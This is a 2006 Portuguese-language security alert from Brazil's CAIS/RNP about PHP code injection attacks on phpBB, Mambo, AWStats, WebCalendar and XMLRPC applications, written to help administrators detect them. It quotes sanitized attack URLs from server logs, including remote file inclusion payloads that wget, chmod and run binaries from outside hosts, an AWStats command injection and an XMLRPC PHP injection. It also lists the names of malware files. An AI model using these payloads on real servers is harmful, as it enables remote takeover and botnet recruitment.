RNP > Serviços > Segurança em redes > Alertas do CAIS

Ataques de injeção de código PHP em aplicações diversas

Alerta do CAIS 20060323

[CAIS, 23.03.2006-12:21, revisão 01]

O CAIS vem acompanhando um crescente aumento nos ataques a diversos produtos desenvolvidos em PHP. Estes ataques normalmente exploram vulnerabilidades que permitem injeção de código externo nas aplicações PHP.

Dentre outros, o CAIS tem observado diversos ataques aos seguintes produtos:

• phpBB
• mambo
• awstats
• webcalendar
• Aplicações que utilizam XMLRPC

Um ataque bem sucedido pode ser usado para diversos propósitos, dentre os quais destacam-se:

• Desfiguração do site (defacement)
• Inclusão de arquivos para a pratica de phishing
• Execução remota de comandos
• Controle total do servidor com acesso remoto
• Instalação de bots para a participação de uma botnet

O CAIS considera todos estes ataques como altamente críticos, sendo que eles podem ser monitorados e detectados através de assinaturas de snort e analise dos registros de log de servidores WWW. Abaixo alguns exemplos de URL's típicas de ataque encontradas em servidores WWW (os IP's abaixo foram sanitizados para preservar as informações):

phpBB:

http://example.com/phpBB2/admin/admin_styles.php?phpbb_root_path= http://192.168.2.1/cmd.dat?&cmd=cd%20/tmp;wget%20192.168.1.1/cacti; chmod%20744%20cacti;./cacti;echo%20YYY;echo|

Awstats:

http://example.com/cgi-bin/awstats/awstats.pl?configdir=| id |

Mambo:

http://example.com/index2.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[option]=com_content&_REQUEST[Item id]=1 &GLOBALS=&mosConfig_absolute_path=http://192.168.1.1/heade.gif?&cmd=cd%20 /tmp;wget%20192.168.1.2/chspsp;chmod%200744%20chspsp;./chspsp;echo%20YYY;echo|

webcalendar:

http://example.com/webcalendar/tools/send_reminders.php?includedir= http://192.168.1.2/cmd.dat?&cmd=cd%20/tmp;wget%20192.168.1.3/haita; chmod%200744%20haita;./haita;echo%20YYY.echo|

XMLRPC:

POST /xmlrpc.php
      <?xml version="1.0"?>
         <methodCall>
         <methodName>test.method</methodName>
                 <params>
                         <param>
                         <value><name>','')); phpinfo();exit;/*</name></value>
                         </param>
                 </params>
         </methodCall>

Na seção de mais informações podem ser encontrados endereços com as assinaturas para o IDS snort capazes de detectar tais ataques. A maioria dos ataques visa a inclusão de arquivos maliciosos nos sistemas atacados, que podem possuir extensões .gif, .dat, .txt, ou mesmo sem extensão. A utilização destas extensões e estes nomes visa camuflar a presença dos mesmos no sistema. A seguir alguns nomes de executáveis encontrados em analises realizadas pelo CAIS:

• listen
• chspsp
• heade.gif
• scripz
• cmd.gif
• gicumz
• cbac
• micu
• mirela
• script
• killos
• criman
• killok
• killop
• supina
• lupii
• nikons
• killoz
• cacti
• haita
• vsf.vsf
• cmd.dat

O CAIS publicou, em 07/11/2005, um alerta referente a vulnerabilidades em diversas aplicações PHP que utilizam XMLRPC. Informações sobre este alerta podem ser obtidas na seção abaixo.

Mais informações:

• Vulnerabilidade no XMLRPC para PHP
• Bleeding Snort - All Bleeding Snort Signatures
• Bleeding Snort - Bleeding Snort web rules
• Bleeding Snort - Bleeding Snort exploit rules
• WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
• Mambo Open Source Multiple Input Validation Vulnerabilities
• AWStats "configdir" Parameter Arbitrary Command Execution

O CAIS recomenda que os administradores mantenham seus sistemas e aplicativos sempre atualizados, de acordo com as últimas versões e correções oferecidas pelos fabricantes.

O CAIS Alerta também é oferecido no formato RSS/RDF:
http://www.rnp.br/cais/alertas/rss.xml

Contato com o Cais:

+55 (19) 3787-3300
+55 (19) 3787-3301

cais@cais.rnp.br

Chave PGP pública do Cais